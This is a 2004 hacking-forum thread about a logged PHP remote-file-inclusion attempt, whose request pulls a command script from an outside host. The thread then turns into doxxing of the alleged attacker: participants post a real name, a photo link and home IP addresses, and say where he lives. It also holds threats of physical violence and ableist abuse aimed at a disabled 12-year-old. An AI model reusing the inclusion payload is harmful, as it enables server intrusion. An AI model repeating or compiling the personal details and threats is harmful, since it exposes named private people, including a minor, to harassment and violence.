22 replies to this topic

[profetas]

I have detected some attack attempts this morning on my server and I started to investigate.

I got this log

200.140.13.120 - - [07/Jul/2004:21:38:59 +0100] "GET /chatterblock/cb_chatLog.php?show=http://mail.omd.it/cmd1.txt?&cmd=id HTTP/1.0" 404 225
200.140.13.120 - "GET /chatterblock/cb_chatLog.php?show=http://mail.omd.it/cmd1.txt?&cmd=id HTTP/1.0"

so I imediatlly recogniez that it was a cross site attack I saw that they got 404, then I connected to


http://mail.omd.it/cmd1.txt and the exploit was there, and then I connected to http://omd.it guess what I got? Yes my own site,
then I instantly though that the site had been “hacked” and they were using it to hack my site,I instantlly blocked their server but then I thought I will disblock to show the people the attack .

They use the chattblock to upload the exploit then they run it. Well I have a 2.6.4 kernel I don't think thay would be able to exploit that kernel as the only vulnerability found on the linux 2.6 kernel is a iptable DOS attack and I had my chatterblock disabled

I love this I get very excited I have more people attacking my site than visiting it but this was the first “real” attack, the other were just script kids using cmd.exe and others IIS attacks on my *nix server, now I wonder does this exploit works?

[Belgarath]

The c code is very standard. All it does is open up a shell and bind it to a port so they can telnet in.

They get root by running another overflow exploit for do_brk vma. If your patched you have nothing to worry about.

Looks like standard script kiddy fare. It just makes use of bad parsing of input in the php script and the c code used has been around for months. This is the same stuff attempted against the hakt.tk server a while back. I think wr ranted about it on the hhc forum.

[profetas]

Looks like standard script kiddy fare.

He is not a script kiddy I found out that he'd taken the omd system and I also found out that his handle is Magnific who belongs to Int3rc3pt0r a very "famouse" group I found a lot of sites that he had previously broken into.
http://www.agrigeoplaza.com/
http://www.ptb.hpg.ig.com.br/
http://www.delta5.co...eationpark.com/
I have also found out that his name is rodrigo and the city where he lives.

the source code had a mixture of portuguese and italian/spanish so I guess he wrote/adapted some part of the code. I will try to find out more

[Belgarath]

Then it just goes to show, even smart people do idiotic things.

The people that attacked the server before where portuguese.

Here is WR's post on hhc:
http://www.hackerhos...wtopic.php?t=68

It may be the attacker stole the code for the expliot from the same people they did.

[jedibebop]

2.6.4 is vulnerable to a few things actually

[profetas]

The people that attacked the server before where portuguese.

They are not portuguese, they speak portuguese and they use a irc server that is portuguese but the guys are
Brazilians

http://www.zone-h.co...er=Int3rc3pt0r/

[Belgarath]

The people that attacked the server before where portuguese.

They are not portuguese, they speak portuguese and they use a irc server that is portuguese but the guys are
Brazilians

http://www.zone-h.co...er=Int3rc3pt0r/

WR looked into it not me. He knows more then I do about it.

I hate sites like zone-h. It just exists to glorify criminal (Black Hat) activity and should be taken down.

[profetas]

if anyone is interested to see the wanker
http://www.fotolog.n...hoto_id=7934731
he is the guy on the right

his name is Rodrigo Pereira

Edited by profetas, 09 July 2004 - 08:02 AM.

[Belgarath]

if anyone is interested to see the wanker
http://www.fotolog.n...hoto_id=7934731
he is the guy on the right

his name is Rodrigo Pereira

I wonder if he is the same guy who tried explioting hakt.tk.

I bet he he would shit his pants if he knew this thread existed.

Edited by Belgarath, 09 July 2004 - 08:22 AM.

[profetas]

man I tell you I will find his house number and I will scare him to death I will find out more. any help from people who's already been after him would be useful

Edited by profetas, 09 July 2004 - 05:36 PM.

[profetas]

I found his IP 200.168.54.46

[phreakblaze]

wow, your ganna really get him good, mental note-{don't try shit on profetas server}

[wonderland]

haha, get him good.

[chillmaster]

im reading up on ipfiltering now and was wondering if you wouldnt mind posting the rule that logged that??

That is dope as hell.

[planktonitus]

Fucking 1337 shit Profetas

[Belgarath]

im reading up on ipfiltering now and was wondering if you wouldnt mind posting the rule that logged that??

That is dope as hell.

That's from a standard apache access log.

[chillmaster]

ok i see it now.

[profetas]

This is how it “ended”.
I went to their IRC channel, to find out some more stuff , there I met one of the member of the group Int3rc3pt0r a guy called hux0x.
I first measured his knowledge with some simple question like: do you use snort, I am trying to use string on my c program but I don't know how.

Well he didn't know much, never programmed don't know much about security tool and every time I spoke to him he seemed to be a very depressed person, later one came the guy I was after the Magnific who is totally different, very arrogant he think he knows everything (I was trying to enter their group) I could not resist his stupidity and I started telling him off, he then banned me from the channel, 4 or 6 hours later I connected back they both were in the channel but only hux0x was present, I started to tell him the “truth” that I wasn't really joining the group, that I was after Magnific his first reaction would be "noone can get me" then I told him that I wasn't after him so he'd better shut up that I also had his IP and a lot of information “lie” from him which he believed. While Magnific wasn't there I started to kind tell that what he is doing is childish so on the conversation went for about 5 min the he started to tell me what I think is the "truth" his age (12) and the following

google translated
< hux0x > man I am sick
< hux0x > I am gonna tell you
< hux0x to you > I have no legs
< hux0x > therefore I am direct in the PC
< hux0x > and it is my only amusement
< hux0x > I am not like the normal people
< prophet > that is not a reason to be rebelled?
< hux0x > do you think it is easy?
< prophet > if you thinks you are sick then you become sick
< prophet > I know that it is difficult
< prophet > let me tel you something
< hux0x > prophet tell me, tell me how to get my legs back?

I am still after Magnific or Rodrigo Pereira.

[White_Raven]

So he is disabled and thinks that is a perfect excuse to fuck with other people? At least that damn rat bastard can SEE THE DAMN SCREEN, he has no excuse to fuck with servers like that and I take personal offence at his insipid excuses making the other handicapped/handy-capable people out there look stupid or mentally regarded on top of everything else due to his fucknut actions; people see his actions and think we are all like that and while some of us don not like our selves or have other issues because of what we lack in abilities due to our conditions that does not make us bad people or retarded fucknuts.

Tell him about me and lets get his reaction then; He has no fucking excuse to be a script kiddy lamer warez whore as being crippled and not having a part of your body work does not give you that right; it can make things harder for you yes but if you give up your nothing but a pussy and a quitter do deserves to die; he could do allot to better himself but chooses not to because he is too busy feeling sorry for himself and that makes everyone he has a connection to, whether it be the disabled or the internet community, look bad.

If I had the same mentality as him I would be dead or in a home, he needs to grow up and stop being a baby; And I am probably the only one here who can get away with saying this due to my being blind, and I know it… So no flames any of you.

[profetas]

I agree with you, I told him that I am against what he is doing , I am not 100% against defacing WebSites but you must have a reason a strong reason , his reason is amusment and while I was talking to him he defaced over 100 web_sites (not really he defaced the web server then changed all the pages that the server was hosting ) The only way to stop these guy is to send a lot of complains to their ISP I tried to contact many people who had been defaced but without success.

But Magnific is a dick , there is no wasy to speak to him, he's totally arrogant and he is already scared of me , and he I will personally smash his face as he lives near me,

their IP is
200.168.54.46 Magnific
200.140.14.168 HuX0r
They are both DSL they may not be static but they had this IP at 09/Jul/2004:12:02:34 +0100